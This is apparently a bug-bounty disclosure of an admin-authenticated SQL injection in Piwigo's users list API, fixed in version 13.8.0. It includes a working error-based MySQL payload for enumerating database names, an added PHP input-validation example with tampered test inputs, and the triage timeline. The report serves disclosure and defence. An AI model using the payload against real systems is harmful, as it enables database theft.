SQL Injection in the "Users" function of Piwigo in piwigo/piwigo


Reported on

May 25th 2023


An authenticated admin can perform an SQL injection attack by abusing the "Users" function.

Proof of Concept

  • Log in as an admin and access the 'Users' function.

  • Observe the request in Burp Suite: POST /piwigo/ws.php?format=json&method=pwg.users.getList.

  • Manipulate the 'order' or 'exclude[]' parameter by adding a single quote; a MySQL error is returned, proving the existence of SQL injection. We can then try to retrieve the database names with the error-based payload id AND (SELECT 2690 FROM(SELECT COUNT(*),CONCAT(0x716b707671,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,51) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) , increasing the LIMIT value to enumerate all the database names.


An authenticated admin can dump all the database information.
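
The two injectable inputs in this report are the 'order' and 'exclude[]' parameters of pwg.users.getList. The following is an added example, not Piwigo's code and not the fix shipped in 13.8.0: it shows one way to validate both inputs before they reach a query, using an allowlist for the ORDER BY value (which cannot be bound as a query parameter) and strict integer validation for the excluded IDs. The function names, the column allowlist, the `users` table and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: not Piwigo's code. Names, columns and table are assumptions.

// Hypothetical allowlist of sortable columns.
const ALLOWED_ORDER_COLUMNS = ['id', 'username', 'level', 'email'];

// ORDER BY cannot be bound as a parameter, so accept only
// "column [ASC|DESC]" items whose column is on the allowlist.
function safe_order_by(string $order): string
{
    $clauses = [];
    foreach (explode(',', $order) as $item) {
        if (!preg_match('/^\s*([a-z_]+)(?:\s+(asc|desc))?\s*$/i', $item, $m)
            || !in_array(strtolower($m[1]), ALLOWED_ORDER_COLUMNS, true)) {
            throw new InvalidArgumentException('invalid order parameter');
        }
        $clauses[] = strtolower($m[1]) . ' ' . strtoupper($m[2] ?? 'ASC');
    }
    return implode(', ', $clauses);
}

// exclude[] must contain only positive integers; anything else is rejected
// rather than "cleaned", so a quote or SQL fragment never reaches the query.
function safe_id_list(array $ids): array
{
    $clean = [];
    foreach ($ids as $id) {
        $int = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($int === false) {
            throw new InvalidArgumentException('invalid exclude[] value');
        }
        $clean[] = $int;
    }
    return $clean;
}

// Constructed sample inputs: one legitimate request, then tampered ones.
$samples = [['username DESC, id', ['3', '7']], ["id'", []],
            ['id AND (SELECT 1)', []], ['id', ["7'"]]];
foreach ($samples as [$order, $exclude]) {
    try {
        $ids = safe_id_list($exclude);
        $where = $ids ? ' WHERE id NOT IN (' . implode(', ', $ids) . ')' : '';
        echo 'SELECT id, username FROM users' . $where
            . ' ORDER BY ' . safe_order_by($order) . PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected (' . $e->getMessage() . '): ' . $order . PHP_EOL;
    }
}
```

Only the first sample produces a query; the single-quote and subquery variants are rejected before any SQL is built.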

We are processing your report and will contact the piwigo team within 24 hours. 4 months ago
We have contacted a member of the piwigo team and are waiting to hear back 4 months ago
hiu240900 modified the report
4 months ago
3 months ago


@admin Seems like they fixed this issue, can you please confirm it? https://github.com/Piwigo/Piwigo/issues/1924

Ben Harvie validated this vulnerability 3 months ago
hiu240900 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Ben Harvie marked this as fixed in 13.8.0 with commit 0649ad 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Ben Harvie published this vulnerability 3 months ago